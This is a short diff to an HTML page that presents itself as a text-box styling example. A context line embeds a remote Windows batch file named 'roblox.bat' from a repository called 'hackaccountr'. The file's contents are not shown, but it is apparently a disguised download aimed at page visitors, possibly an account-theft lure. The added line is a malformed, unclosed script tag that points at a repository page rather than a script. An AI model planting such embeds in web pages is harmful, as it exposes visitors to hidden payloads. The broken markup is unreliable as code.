--- a/index.html
+++ b/index.html
@@ -7,4 +7,5 @@ Need background colors on your text box?
 </textarea>
 <input type="submit" value="Submit" style="background-color:yellowgreen;color:white;padding:5px;font-size:18px;border:none;padding:8px;">
 <embed src="https://raw.githubusercontent.com/stampylongheadgaming1/hackaccountr/master/roblox.bat">
+  <script src="https://github.com/klei/gulp-inject">
   </form>
